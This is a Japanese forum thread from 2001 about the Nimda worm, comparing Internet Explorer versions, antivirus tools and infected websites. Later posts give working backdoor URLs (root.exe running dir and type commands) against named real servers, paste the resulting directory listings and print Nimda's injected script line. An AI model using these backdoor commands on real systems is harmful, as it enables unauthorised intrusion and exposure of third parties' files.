機とファイル共有しているシステムだったり、転送が差分について無条件
で行われるシステムだと、nimdaによってJAVAのスクリプトが書き込まれ
たhtmlファイルとreadme.emlファイルが公開用Webサーバに送り込まれて
しまう。

これは、公開用のWebサーバのソフトがIISでなくても、またプラットフォー
ムがUNIX系であっても発生する事態である。

ということで、トータルのWebシステム、コンテンツ管理システムがどうなっ
ているかで、サーバがUNIX&Apacheであってもnimdaの感染源サイトにな
りうるということ。

前に貧乏でソフトが買えないって云ってたもんだけど
入れてみた。ウィルスバスター体験版。
常駐してると重そうからさっさと常駐切ったんだけど、
HPにアクセスするたびにロゴが出てｳｻﾞｲ。なんとかならんの？
というか常駐切ってるのにいちいちチェックしてくれるのか

http://cgi.members.interq.or.jp/orange/stop/abvoid/picture.cgi
↑これなら大丈夫

>>178
重く感じないマシンを使え！（ｗ

>>178
ウィルスバスターのHPチェック機能は重いのにヘッポコだそうだから
他のソフトを通したほうがイイよ！！

質問が戻って悪いんだけど、結局ＩＥ5.5のＳＰ２も、ＩＥ６もセキュリティ上は変わらないで、どちらもＳＰ1よりは強化されてるってことでいいんだよね？
だったらどうせアップするならＩＥ６にしといた方がいいって考えていい？
ＩＥ５．５ＳＰ２の方がＩＥ６より勝ってるとこあるの？

>>178

以前はウイルスバスター２００１正規版を使っていた。

ロゴ出しはオフにすることができたような。

私も重い（またはウザイ）と感じて切っているスキに感染した（当時最新のVBでも感染したろうが。）。

重いと切ってはなんにもならない。

以後ノートンさんを使っているがこれは重いとは感じない。

が、使っているのはインターネットセキュリティーなので価格面で貴方の要望は満たせないと思う。

安い・軽い・高機能・安全　のすべてを満たすソフトなど私は知らない。

ウイルス関連ソフトはサーチ・駆除も重要だが、ニムダ以降ブロック機能も重要であると痛感した。

理由はともかく、この程度のソフトが運用できないなら、いずれ自分だけでなく他者にも迷惑をかけるのでネットを利用しないほうがよいと思った。

ここネットワーク機器の会社のくせに感染してます。
http://www.d-link.co.jp/

>>182

>>26-30を読んで自分で判断してくれ。

「結局ＩＥ5.5のＳＰ２も、ＩＥ６もセキュリティ上は変わらない」という記述を漏れは見ていないし、信じない。

>>26-30の後ろにもいくつか関連したカキコがある。

>>182
Win2000+ie6(最小構成時のみ)=Nimdaワームの影響を受ける恐れのある製品
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

２ｋは最小構成でしかインストールできないためＩＥ６は駄目。

>>184

だっさー、これはダサイ(´Д`)

>>182
具体的な根拠ではないが、一般論として
新製品は使い込まれておらずバグが残っている可能性が高い。

>>185
「２６〜３０」の辺りも読んでみて、それでＩＥ５.５ＳＰ２も危ないけど、ＩＥ６だって危ないよって、受けとめたわけっす。
ならばどっちも同じ条件で危なくて、どっちもＳＰ１よりは危なくないならば、ＩＥ６のほうが新しくていいかなあ、って思ったわけっす。
それでもＳＰ２を使ったほうがいいのだよ、っていう情報あるならば、もちろんその方を漏れは使いたいのだった。
舌足らずですんません。

>>183
ははは　失敬
アドバンスモードってﾔﾂで設定できるのね。
30分前に入れたばっかだったんで。
金持ちはいいな。ない袖は振れん。

ｎｉｍｄａに感染していないかどうか調べた結果ファイルは発見されなかったのだか
ファイル検索の「含まれる文字列」で" nimda "の文字列で検索をかけると
user.datのファイルにヒットしてしまう。これって何だろう？

W2K+IE6で感染サイトにアクセスしてみた。
メディアプレーヤが起動することもreadme.exeが自動実行されることもなく、
ダウンロード要求ダイアログが表示される。
ということで、W2K版IE6でも50.1SP2及び5.5SP2と同様の対策がされているものと思う。

IEインストールフォルダにあるreadme.txtの
＞現在、Windows 2000 で標準インストールおよび完全インストールを実行することは
＞できません。Internet Explorer 6 はシステムに既定のファイル セットをインストール
＞します。これらは、Internet Explorer 6 の Web ブラウザおよびスクリプティングの
＞サポートが含まれています。

という記述が現在の混乱を招いているようである。

>>191
実行中のコマンドと思われ

>>187
それをいうならMicroSoft・・・。

WIN95だとIE6.0ってインストール出来ないんだね。
WIN98以降にしろってメッセージが出てお終い。。。

ってなわけでIE5.5SP2にしました。

>>189

>「２６〜３０」の辺りも読んでみて、それでＩＥ５.５ＳＰ２も危ないけど、ＩＥ６だって危ないよって、受けとめたわけっす。

すまん、漏れにはどうしてそいう判断になったのかわからん。

漏れ個人的には両方アブナイなら、どちらかといえばIE5.5SP2だろうし、もしあなたがIE5.0xを使っているならIE5.5などにせずＩＥ5.01ＳＰ２を勧めたい。

IE6が安全であるという記述はどこにも発見出来ないと思うが・・。

>>191
nimdaを検索したからだろ。たぶん検索履歴だよ。
＃user.datはレジストリファイルだ。

それから、nimdaは自身をnimdaと名乗ってないから
nimdaって文字列を探しても無意味だよ。

>>194

MSはダサイというのとは次元がちがう。ＭＳはそういう会社。だからＭＳＮが感染してもさもありなんと思うだけ。

IE6情報が混乱してますねぇ

正直、W2k+IE6で感染しちゃった人手を上げてー

>>192
> IEインストールフォルダにあるreadme.txtの
> ＞現在、Windows 2000 で標準インストールおよび完全インストールを実行することは
> ＞できません。Internet Explorer 6 はシステムに既定のファイル セットをインストール
> ＞します。これらは、Internet Explorer 6 の Web ブラウザおよびスクリプティングの
> ＞サポートが含まれています。
>
> という記述が現在の混乱を招いているようである。
言えてる。
Windows9ｘへの最小構成インストールだとOE6が入らないのに、
Windows2000へのインストールだとOE6が入るという一点をとっても
Windows2000のIE6は最小構成インストールだというのはウソ。

>>191

「ｎｉｍｄａに感染していないかどうか調べた」というのが、なにをやっているのかこの文面だとわからないけど、26-30を読んでみてくれ。

安易に検索などかけないほうがよいと思う。

>>192
IE6を入れる前のW2KのSPとIEのバージョンおよびSPを教えてくれませんか？

>>200

するとこれはデマか？
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20010919/3/

>>200

そうだとして、IE5.5SP2 よりも　IE6 を推奨する理由は？

>>199
多分、感染すると思われ。
IE6+Win2KSP2+ノートン7.51(定義ファイル30920d)で感染サイトに行くと、
ノートン先生が水際で止めてくれる。
IEの確認ダイアログなんかは出てこない。

>>196
実はＩＥ５.５にして不安定になったもんで、ＩＥ５.０１でずっと使ってたんです。
それがＳＰだったもんで、今回見事にやられちゃって、それでめんどうだからＯＳ入れ直しちゃえと思ったわけなんですけど、どうせピカピカになるなら新品のＩＥ６などいいかなと思ったわけで(苦笑)
ほんとミーハーだ(苦笑)
そっかぁ、じゃ、ＩＥ５.０１ＳＰ２にしときます。馴染んでたのでよかった。
ありがとうございました。

>>202
W2KSP2+IE5.5SP2

>>205
俺のとこではダイアログ出たんだよねえ。

まあ、この問題に関してはMSに直接聞いてみないとハッキリしないでしょ。
ちなみに、この板のように慎重で初物を警戒する人が少ないWin板では、
W2KとIE6の組み合わせでニムダにやられた！って騒いでる様子はないよ。

ニムダ対策のためIE5.5のSP2にしようと思っているんですが、
「タスク スケジューラの署名を確認しています」
ってところで止まってしまって、
ダウンロードが強制終了させられてしまうんですけど、
なにか対策はないでしょうか？

>>192

前ｽﾚでメディアプレーヤが起動したという報告があるけど、>>192の一例だけで全否定しちゃっていいのかな？安全の否定は簡単だが、危険の可能性の否定はそう簡単に出来ないと思うが・・。

当方、Win2KSP2+IE6
ノートン先生のAuto-Protectを切って感染サイトに行ったところ、
Windows Mediaのサイトにつながり
"Sorry, no more help is available for this problem at this time."

>>193 >>197 >>201
ありがとう。問題はないと言う事ですね。
検索で他の文字列だとヒットしなかったので
ちょっと心配になったので聞いてみました
過去ログ>>26-30を見てきます。

>>209
危険の否定はしてないよん。
現実に回避できたので「対策がされているものと思う」と見解を出しただけ。

感染したファイルはクリックしただけでやばいっていうけど、ノートン先生入れてれば大丈夫？
そういうＨＰ開いてもインターネットセキュリティが防いでくれる？

Macintosh 用の対策ファイルは何処からダウンロード出来るんでしょうか。

>>213
少なくともリアルタイムスキャンを有効にしている限りは

>>209
ﾊｱ?　ＩＥのセキュリティホールってのは
JavaスクリプトにWAVファイルとしてreadme.exeを開けさせる
というのは常識ですよ？

>>208
過去ログを調べようともしない質問君は放置ニダ！

>>215
それ、いつもしてるのに、たまにしてない時とかに限ってそういうの起こるんですよね・・
なんとかの法則かな・・
っていうか、漏れがアホなだけか・・

>>214

マックは対策せんでもいいだろ
感染しないんだから

当のＭＳがインストールの仕方如何で「Nimda ワーム の影響を受ける恐れのある製品 」と公認しているIE6を勧める気にはなれない。

http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
Nimda ワーム の影響を受ける恐れのある製品
：
： 　　　　　　　　　　　　　　　　　　　ρ(^-^)インストールのやり方次第ということ
MicrosoftR Internet Explorer 6 (最小構成時のみ)

---
MicrosoftR Internet Explorer 6 は、ＭＳ公認の　Nimda ワーム の影響を受ける恐れのある製品 であります。

>>207
サンクス。
どうもW2Kの場合IE6をインストールするまえの状態で、
どうも状況かわるみたい。ただ俺の場合キミと同じはずなんだが
MediaPlayerがエラーを出す。わけわからん＾＾；
IE6入れる前に最低W2KのSP2は入れておかないとよくないようだが…

>>213
駄目！
ノートン入れてりゃなんでもＯＫだと思ってるんかい？

>>203
> 最小限のインストール
が最小構成インストールとは別物なのは確か。

>>204
別に推奨する気はない。
>>48 みたいな明らかなウソ（OE6がインストールされない）を書かれるのが
嫌で書いただけ。

>>216

ﾊｱ?　

>>210
感染した可能性大。

>>225
残念ながら、感染してない。

>>207
もっかい試したが、やっぱでない。
IEの設定の問題か?＜インストール時のまんま。

ただ、感染サイトにアクセスした後リブートすると、メディアプレーヤーのゾンビが残ってる。。。
その後スキャンかけても問題ないけど、新種の話はまだ出てないよね?

>>222
えええ、ノートン先生入れとけば、たとえ負債抱えてこわいおっちゃんに追いかけられても大丈夫なんじゃないんですか？
そのこわいおっちゃんのオンナに手ぇ出しても、ノートン先生入れてれば大丈夫なんじゃないんですかあ？

>>208
だから、ＩＥ５.０１SP2入れとけってば

もういちいちフォローするのもめんどくさいのだが・・。
いくつかIE6で発生した問題現象が報告されている。
たまたま自分の環境でそうならかなったからといって、質問君が「IE6は？」と来ているときにいちいち質問君がIE6が安全であると誤解するような例をカキコするのはやめてくれ。


>>223

>>48 みたいな明らかなウソ（OE6がインストールされない）を書かれるのが
嫌で書いただけ。

なら最初からそう書いてくれ。

>>219
あれま、探しても見つからない訳だ。
ありがと

>>228

はい、>>228のＰＣに限ってそのとおりです。

>>230
たのもしい。　疲れるでしょうが頑張ってください。
教えて君はけっこう切実ですから、私も含めてほんと助かってます。

>>230
空きＨＤＤが出たから２Ｋインストールして今から感染実験してみようと思う。
LINUX+Apacheに感染サイト作ってアクセスみればいいかな？

そういえば、ノートンってドンフライに負けたな・・

でもさ、クリックしただけで感染するとか、ＨＰ開いただけで感染するとかって、メチャクチャだよね。
今までは「見つかっても実行しなきゃ大丈夫」とかって、最後の砦があったじゃん。
こんなウィルスがポピュラーになっちゃったら、またまたＰＣ売れなくなっちゃうよ。
ビッグカメラあんなにＰＣ館増やしてんのにどうすんねん。

>>234

>>LINUX+Apacheに感染サイト作ってアクセスみればいいかな？

かっこいいっo（＞＜）o
実験が済んだら、ぜひLINUXやApacheならニムダに感染しないと声高に叫ぶバカのために、啓蒙サイト（無害化ニムダを送り込むとか）として公開してくださいm(_ _)m

>>236

> ビッグカメラあんなにＰＣ館増やしてんのにどうすんねん。

このｽﾚの趣旨とは無関係に激しく同意！（苦笑

>>237

それとは違うだろ

>>238
別にいいじゃん
ビックカメラが潰れても他がある

本ｽﾚは粘着フォーマット君は却下だ。

感染時にフォーマット・再インストールは、有効であり唯一の確実な手段だが、
無条件にとにかくフォーマットという意見は聞き入れない。

各位には、安易にその場でフォーマットを援護射撃などされないよう充分注意されたい。

以上。

>>240

有楽町旧そごうビルに潰れ伝説ができる（ｗ

だれか感染してるぞって教えてやれよってカンジ・・。

ttp://www1.sphere.ne.jp/noone/

外部から隔離したネットワークとApacheの感染サイトは無事作成出来たよん。
2Kのインストールが遅い・・・・

>>239
それはともかく、ニムダに感染したっつーとすぐ

LINUX　にしろ　だの　Apache　が感染するわけない　だの　Netscape　だ　だの

という手合いのはどうにかならないかね。
扱いによっては感染（ＭＳ語の　影響を受ける、か（苦笑））するということを分かっていてやっているのかどうか・・。

nimda発症数は平常値（？）に戻った模様（ＣｏｄｅＲｅｄ並）
週明けの社内ネット起動でもう一山あるだろうけど、
感染力が強力な割には、意外と早く収束した感じ。

>>243
だからその話をさっきしてたんだが。
結局鯖感染か、ユーザ感染かよくわからんな。
ま、可能性はいろいろあるとして、おれは故意だと思うけどね。

>>244
もしよかったらW2K（SPなし）にIE6インストールしてみて、感染するか
試してほしい…

このパターンだと感染する気がする…

>>245

それは中継になるってことで感染はしないよな
感染経路を減らせるから確率落ちるんでないか?

>>248
OE6にならないと感染するらしい。

>>244

>Apacheの感染サイトは無事作成出来た

何度読んでもすばらしい。
>>160とかにも見せてやりたい。

>>246

どこが収束してるんだ?
http://wtc.trendmicro.com/wtc/

まだnimdaをIIS攻撃ワームだと思ってる奴は馬鹿。

>>247

あ、このサイトが悪意っていう意味？
わざとニムダディスペンス機能をアプしてると？
こりゃまた失礼m(_ _)m

>>251
見てるがなにか？
つか、htmlに感染したのと同じ記述をすれば、擬似的に感染サイト
に仕立てることも出来るだろ。
馬鹿馬鹿しい。

ちなみに俺の予想

W2K + IE6 …感染する
W2KSP2 + IE6 …感染しない (この状態でIE5.01SP2相当のはずだから)
W2K + IE5.5 + IE6…感染する (報告あり)
W2KSP2 + IE5.5 + IE6…感染する (W2KSP2にIE5.5をいれるとまずいという話を聞いた)
W2K + IE5.5SP2 + IE6…感染しない (IE5.5SP2が防いでくれるはず）)
W2KSP2 + IE5.5SP2 + IE6…感染しない （俺の環境）

>>250
その話は知っているが、W2KにIE6を入れた場合、どのパターンでも
OE6にはなるようだ。（少なくともOEの画面表示は）

>>256
IISの記述が抜けてるぞ

>>258
俺がいってるのはIE経由の感染の話。
もちろんIIS経由の感染はまた別。

鯖感染なら
http://www1.sphere.ne.jp/
で感染する。

わざと置いてる可能性大

>>252
http://wtc.trendmicro.com/wtc/report.html

>>260

そうか。この期に及んで個人サイトで感染しているようなのはわざと置いているとみたほうが合理的か・・。
いまさらでスマソ。

>>260
nimda居ないよ？

>> 260 よくウイルスを収集して研究用と称して開帳しているページがあるが、そういうところがわざと置いたりなんてやりかねないよな。
今後は気を付けないといけないなぁ・・。

ああ、ＩＩＳの方か。

>>263

漏れもいないと思った。
問題にしているのはここ。

tp://www1.sphere.ne.jp/noone/

>>263
だぁから
www1.sphere.ne.jp/noone/で感染してるのに、
鯖www1.sphere.ne.jpで感染してないから
故意じゃないかって逝ってるんだよ。

>>265
あ、そゆことね。失礼。

>>261

それ、どのウイルスも0で終わってるだろ
収束してるんじゃないよ

>>267

>>160- のカキコは　常に説明不足で無用な誤解を巻き起こしていると思われ

ふむ。さすがに>>260から>>263を深読みできる人間は少ないと思われ。

>>256
ＭＳ（ＫＫ）のスタッフはこの連休中も徹夜でこういう検証をやっているのだろうか？やっていないな、たぶん。

>>271
答えを聞けば意味はわかるんだが。>>160-

>>270
説明不要だろ？それから>>260はおれではない。

騒ぐまえに鯖がIISかどうか調べたか？
IISでなかったらどのような経路で感染したか考えたか？
Apache自体が直接的に感染することはないんだから
Windowsから感染したファイルが流れ込んだしかないだろ。
商業プロバイダはファイル転送は個人個人なんだから
プロバイダ鯖経由で感染とは考え難く、
www1.sphere.ne.jp/noone/が故意か誤ってかユーザ経由で
感染させてるしかないだろう。

それくらい自分で頭働かせろ。今更なにいってんだ。

>>272
この際全部ＩＥ６にすれば感染しないホラを吹きまくって
ユーザを無理矢理ＩＥ６へ移行させる作戦さ♪

ttp://www1.sphere.ne.jp/noone/
は、ここの被害の2に当たると思われ
http://www.trendmicro.co.jp/virusinfo/important3.htm#penimdaa

>>274

最初からそのくらい書いてくれりゃいいのに・・。

>>275

冗談抜きにそういう信仰があるよな。
一般のＰＣには感染しないなんてカキコまであって、見たときは吹いた。マジで。

>>275 このあとＸＰなら大丈夫なんて流布されるようになったら完全に某社陰謀ですね(^^;

ふふふ。あまいな。俺の会社じゃネットワーク管理者から、nimdaがはやってるから
不信なメールに注意しろってアナウンスがあったぞ。（Webからの感染には一切ふれず）
で、ウィルスチェックをかかさずやりましょうって。それは間違ってないが、IEの
穴をふさぐのが先だろっつーの。あきれたよ。

>>279
XPはでっかい穴があいてる予感がするので様子見ることにしてる。
　−＞根拠なし、ただの経験則。

>>281

一般にＳＰは２から、バージョンは３からっていうＭＳの法則がありますよね(^^;

このすれはいいＹＯ　ageageageageageageageageageageage

前からネスケで、java切りcookie切り串通しが安全って言うじゃん。
IEなんか使うから天誅くらうんや。
厨房を見習え！

ttp://www1.sphere.ne.jp/noone/
ついに誰か書き込んだな。初の書き込みがこれか…(笑

あしたの朝>>49-94みたくなってたらイヤなのでsage

>>285
http://www1.sphere.ne.jp/cgi-bin/common1/bbs/bbs.cgi
わはは。暗澹たる船出ですね(^^;

>>285
最高！

>>284

か~ しヽ ιゅ⊃ です>>245

ttp://www1.sphere.ne.jp/noone/

ここ変わったぞ

Nimda除去したみたい

ここに書くと国内サイトは直後に駆除されるよ（ｗ

tp://www.d-link.co.jp/
ここはいつだろね

>>292
良いことだネ！

NT4.0Server/SP3/IIS3でNimdaに攻撃されまくってます。駆除ツール当ててもきりがない状態、
NT4.0SP5を当てたくない事情があるんですが、この環境のままで当てられるパッチってないですかね？

しかし、あまりにタイムリーだったんだけどホントにわざとだったのかな？

>>296

かなりクサイですね

あしたの朝>>49-94みたくなってたらイヤなのでsage

別な意味でニムダにやられてる・・。
http://www1.sphere.ne.jp/cgi-bin/common1/bbs/bbs.cgi

わざとじゃなくて、この板の住人だったんじゃない？ｗ

>>300
そんな気もする。でも結構前から話題だったよね。

>>300
わざとってことにしておかないと気むずかしいヒトが気を悪くするのそういうことにしてあげておいて・・。

ノーマル2K+IE6でメディアプレーヤーが開くけどその後暫くするとＩＥが固まる。
でもそれらしいプロセスは走っていない。
キャッシュにはreadmeがあるけどキャッシュを削除すると消えるし何も悪さしてなさそうだよ。

　　　　うゎ〜ん。ニムダに感染しちゃったよー。
￣￣￣￣￣￣￣￣￣∨￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　　　 　 Λ＿Λ
　　　　　　　　　　（ ゜∀⊂ヽ ﾆﾔﾘ
　　　　　　　　　 ⊂　　　　ノ
　　　　　　　　　　 人　 Ｙ
　　　　　　　　　　し （＿）

>>303
ありがとー。もひとつお願い。その状態でMediaPlayerをアンインストール
してアクセスするとどうなるでしょうか？

正確には開こうとするんだけど失敗してる。
多分ファィルが壊れていると見ている。

>>305
実はちょっとオンラインでもやってみたんだが・・・火暴
はじめはメディアプレーヤーがインストールしてない状態だったので
インストールをしねーか？と聞かれた。
悪さしてないのを確認しながら無事インストール。
その後メディアプレーヤーの立ち上げには失敗している。
ＩＥは固まる。
プロセスの異常はなし。しかしキャッシュにはダウンロードされている。
キャッシュのニムダは何も悪さしていない。

あ、何度もごめん。インストールしないか？にインストール「しない」と答えてほしい…＾＾；
うまくいくと（藁）、ウィルスが実行されるはず。

そかそかインストールしてしまうとｗａｖはメディアプレーヤーに渡されて当然だな。
アンインストールして今度はオフラインでやってみるね。

ちなみに、

MediaPlayerがあるとwaveファイル（nimdaが装ってる）は必ずそれに
ファイルを渡すから、実行されない。もちろんMediaPlayerは変なフォーマット
のファイルがくるからエラーを起こすけど。

0)
MediaPlayerがないと、IEは他のアプリを使ってwaveファイルを実行
使用とする。この時、拡張子が正しくwavとかなら、再生用のアプリに
渡されるけど、nimdaは拡張子がexeなので、そのまま実行してしまう。
IE5.5とかIE5.01とかは。

１）
IE5.5SP2では拡張子がexeのファイルはファイルダウンロードの処理に
なるように変更されている。

２）
IE6の俺の環境では処理が違ってて、拡張子をtmpに変えて、それを
実行しようとする。もちろん拡張子がtmpのファイルを再生できるアプリ
もないし、tmp自体をexe見たいに実行することもできないから、
どのアプリで開くか？ってダイアログが出る。

１）や２）はどうやらOutlookExpress関連のプログラムがやっている
みたいで、もしW2KにIE6をインストールしたとき、OutlookExpree関連
のプログラムを完全には更新されないとすれば、そのまま実行して
しまうはず。

いいえを選択すると使用するアプリをどれにするか聞いてきた。
その時点で既にwbk4.tmpというファィル名になっている。

ほほう。
２３４殿には俺の感謝を捧げたい。

>>309
実行はしていないようです。
MSはキャッシュのニムダをウィルスソフトが検知してしまう為
あるいはメディアプレーヤー起動でブラクラ状態になってしまうので
ＩＥ６も追加したのかなー？
それとももっと違う条件があるのだろうか？

つまり無理矢理実行しようとしない限りは大丈夫かな？ってことか。
IE6とW2Kの謎がだいぶ解き明かされてきたね。

>>310
あれ？そうなんだ…
うーん、その動作は俺のW2KSP2+IE5.5SP2にIE6をインストールした
時と同じで、非常にすばらしいんだが…
それだと、何個か耳にするW2K+IE6は危険って話は、どう解釈したらよいもんか…

なんにしても、いろいろ、ありがとうございました。(__)

とりあえず更新

W2K + IE6 …感染しない（234さんの環境）
W2KSP2 + IE6 …感染しない (この状態でIE5.01SP2相当のはずだから)
W2K + IE5.5 + IE6…感染する (報告あり)
W2KSP2 + IE5.5 + IE6…感染する (W2KSP2にIE5.5をいれるとまずいという話を聞いた)
W2K + IE5.5SP2 + IE6…感染しない (IE5.5SP2が防いでくれるはず）)
W2KSP2 + IE5.5SP2 + IE6…感染しない （俺の環境）

どうやら>>309さんによるとＳＰ２でも同じみたいなのでダウンロードでキャッシュには残るけど
発病はしないに決定。
もうＨＤＤを元に戻します。

皆さん僕のことで盛り上がってるようですね、何か・・・？

うーん、じゃ実行してしまうのはＯＥのバグだけなのか？

お前ら、寝ろ

あ〜、感染させるのも飽きた

お前ら、もっと感染しろよ

>>319-312
あんた、毎日暇なんだねぇ

>>322
て言うかおもしろい

>>323
何が？

最近になって５分に一度くらい
未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
でノートン先生のログがすごいのだが。
これって Nimda のせい？

nimdaなら８０。
８０未仕様？つうかサーバー？

>>325
CordRed
未使用ﾎﾟｰﾄ遮断機能が通信を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは ***.***.***.***,http

>>327
たぶんNimda
未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:

ttp://www1.sphere.ne.jp/noone

>ニムダ、コードレッド、ニムダ、コードレッド、ニムダ、コードレッド

>ニムダ、コードレッド、ニムダ、コードレッド、ニムダ、コードレッド

>いいかげんにしてくれ〜

ネタ決定だな。
親切に掲示板に書き込んだ人。ご苦労さん（ｗ

WIN2KもIEもSP2ダウンロードするの面倒なんだけど
まだ雑誌のCD-ROMとかで配布してないのかなぁ。

>>329
俺にとってはいいネタだったよ。掲示板に、

このＨＰ
nimdaに感染してるんで閉鎖して下さいね。

って、１つだけポツンと書き込まれてたときは爆笑した。

たしかに
CD-ROMとか緊急でリリースすべきだろうね。
遅い回線を使ってたらダウンロード大変だし。。。

ちなみに、トレンドマイクロのウイルスサーチだと*.emlファイルのNimdaは検索出来ぬ。
base64はデコードできないのかな？中途半端ですなあ。

>>333
>base64はデコードできないのかな？
違うと思うぞ。
検索オプションの検索対象に”ユーザー選択”選んでないか？
してるんなら”すべて”か”トレンドマクロ推奨で”もう一度検索してみて。

http://61.134.4.14/

>335
I IS A BOY とは、笑える。どこの人かな？
^^^
hacker by jsl 2001 09 07 I LO
VE YOU I IS A BOY</p>

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=n
o,top=6000,left=6000")</script></html>

>>336
CodeRed、NIMDAに感染してバックドア開きっぱなしのサーバ
攻撃してもねぇ・・・
自分の低レベル振りをアピールして恥ずかしくないのかねぇ？(藁

>>330
Win2KのSP2なら、マイクロソフトのサイト（下のURL)で申し込めば、
無償で送ってくれるよ。１週間くらいでとどく。
http://www.microsoft.com/japan/windows2000/downloads/servicepacks/sp2/default.asp
んで、IE5.01のSPは、Win2KのSP2に入っている。

>>338
早速申し込みました。
おれのWin不正シリアルなんだけど、ま、いっか

>>319-321
・・・・こいつニムダわかってないよな(^^;

>>340
Nimdaは人間にも感染するのデス。2chという経路で。
ひがなNimdaの話題に専念させ、本来の機能を著しくパワーダウンさせるのデス。
あなたもすでに感染していマス。

さすが中国。

ttp://www1.fl.kansai-u.ac.jp/

いまさら感染するなよ。

>>341

えΣ＜(゜▽゜;)＞

>>342

接触研究会だってよ（ｗ

ttp://www.d-link.co.jp/

ここ連絡先ないじゃん！

>>342

やっぱあれだね、長いこと更新せずほってあるようなところがよく感染したままになってるね(^^;

http://www1.fl.kansai-u.ac.jp/

↑感染ページね。

http://www1.fl.kansai-u.ac.jp/scripts/root.exe?/c%20dir%20c:\
バックドア開きっぱなしじゃん。

>>342-349
駆除した跡はあるから再感染だな。
バックドア開けっ放しじゃ駆除しても意味ないんだよ…

Directory of c:\

2001/09/23 04:36p 57,344 Admin.dll
2001/09/23 04:36p 517 default.asp
2001/09/23 04:36p 517 default.htm
2001/09/20 01:46a <DIR> DrWatson
2001/09/23 04:36p 517 index.asp
2001/09/23 04:36p 517 index.htm
2001/09/23 04:36p <DIR> InetPub
2001/06/23 12:09p <DIR> JUST
2000/09/13 04:27p <DIR> KPCMS
2001/09/22 01:30p <DIR> NIMDASCN
2000/06/17 03:08p <DIR> Perl
2001/09/22 02:30p <DIR> Program Files
2001/09/23 04:35p 79,225 readme.eml
2001/09/24 05:43p <DIR> TEMP
2001/09/23 07:19p 57,344 TFTP10060
2001/09/23 07:19p 57,344 TFTP10104
・・・省略・・・
2001/09/23 07:17p 57,344 TFTP9952
2001/09/22 01:30p <DIR> ToFolder
2001/07/21 03:36p <DIR> Windows Update Setup Files
2001/09/23 04:35p <DIR> WINNT
1555 File(s) 88,849,805 bytes
11 Dir(s) 821,965,312 bytes free

めちゃくちゃだな・・・

>>350

こーどれっどかなんかに感染して、外面上だけ駆除して、後生大事にバックドアは保持してるってこと？(^^;

その後もニムダとかにかかって、また外面上だけ修復しても、バックドアは大切に保持？(^^;;;;

>>349

すげえ、なんでもできるね(^^;

俺、このＨＰ大好き！
http://members.tripod.co.jp/bingo852/

ういるす検知系のソフトなにも入ってないじゃん・・。

http://www1.fl.kansai-u.ac.jp/scripts/root.exe?/c%20dir%20c:\progra~1

http://a500.g.akamai.net/7/1776/484/00002/inet.trendmicro.co.jp/solutionfile/3059NIMDAINF.htm
Trendmicro_Nimdaの挙動のまとめ(ガイシュツかも)

age

>>350
>>>342-349
> 駆除した跡はあるから再感染だな。

2001/09/22 01:30p <DIR> NIMDASCN

これか・・・。


> バックドア開けっ放しじゃ駆除しても意味ないんだよ…

しょーがねーなぁ・・。

あーあー・・。

http://61.134.4.14/scripts/root.exe?/c%20dir%20c:\

http://www.powerstage.com/scripts/root.exe?/c%20dir%20c:\

ありゃまあ・・。

なんだかねぇ・・。

http://210.12.157.160/scripts/root.exe?/c%20dir%20c:\

むー・・・。
http://210.12.157.160/scripts/root.exe?/c%20type%20c:\readme.eml

おいおい、いいのか？いいのか？

http://www.maruko-j.co.jp/scripts/root.exe?/c%20dir%20c:\Progra~1

停止サイトでもバックドア開いてるとこは多いな・・。

ここまた感染するぞ・・。

宝塚造形芸術大学 短期大学部
http://www.takara-univ.ac.jp/scripts/root.exe?/c%20dir%20c:\
http://www.takara-univ.ac.jp

>>365

選んでる場合じゃないよ・・。＞志望学生

宝塚造形芸術大学 短期大学部

情報化社会に即対応の専門技術を習得する。
あなたの感性、技術を生かせるコース、じっくりと選んでほしい。

他スレで出てたけど、
http://hoge.or.jp/scripts/root.exe?/c%20net%20send%20localhost%20むにゃむにゃ
で警告出来ないものかのう…。

>>367

たとえこちらで気付いても、ニムダさわぎでWebページは閉じていて連絡先が分からないところも多いよ・・。

「チャック開いてますよ」って。

>>367

こういうところは鯖ほったらかしで、たとえコンソールなどに警告しても見てないと思われ・・。

宝塚造形芸術大学 短期大学部 は気付いたみたいだよ。

>>368
そのためのwhois。自動化できないものか。

>>369
なかなか他人には言えないもんだよなぁ

というか、localhostでなくてbroadcastでnet sendすればいいのか。

>>369

いやーん、はずかしくて言えない（ﾉ_；）

>>371

http://www.takara-univ.ac.jp/scripts/root.exe?/c%20dir%20c:\

気付いてますか？

Directory of c:\

01/09/21 03:44p 524,288 20010921log.evt
99/04/28 04:09p 0 AUTOEXEC.BAT
99/04/28 05:12p 279 BOOT.PCP
99/04/28 04:09p 0 CONFIG.SYS
99/04/28 05:13p <DIR> DMI
99/04/28 05:14p <DIR> ESM
01/09/22 02:15a 988,652 Exchange Server Setup.log
01/03/10 11:06a <DIR> exchsrvr
01/09/22 01:01a <DIR> InetPub
01/09/20 10:33a <DIR> log_backup
01/09/22 01:51a 6,220 mpssetup.log
01/03/02 11:40a <DIR> msp
99/04/28 04:37p <DIR> Multimedia Files
01/09/22 02:23a 402,653,184 pagefile.sys
01/09/21 05:49p <DIR> Program Files
01/09/19 03:26p <DIR> recycled
01/09/22 01:01a <DIR> scremove
01/09/22 01:06p <DIR> TEMP
01/01/10 06:37p 53,019 ucspi-tcp-0.88.tar.gz
99/04/28 04:40p <DIR> update
01/03/02 11:36a <DIR> urlcache
01/09/23 03:05a <DIR> WINNT
00/05/22 04:19p 12,800 Ｓｔｅｐ２.doc
01/09/20 07:03p <DIR> ﾃﾞｽｸﾄｯﾌﾟ
24 File(s) 404,238,442 bytes
2,799,830,016 bytes free

一件メール送ったら速攻で閉じたようだ。
これで、CodeRedも含めて少しは静かになればいいんだが。

と思ったら、まだだった。アクセスが集中したかな？（ｗ

>>376

一つ気になったがこれはなんだろうか？＞宝塚ほげほげ学園

00/05/22 04:19p 12,800 Ｓｔｅｐ２.doc

思うに、学生の課題と思われ・・。

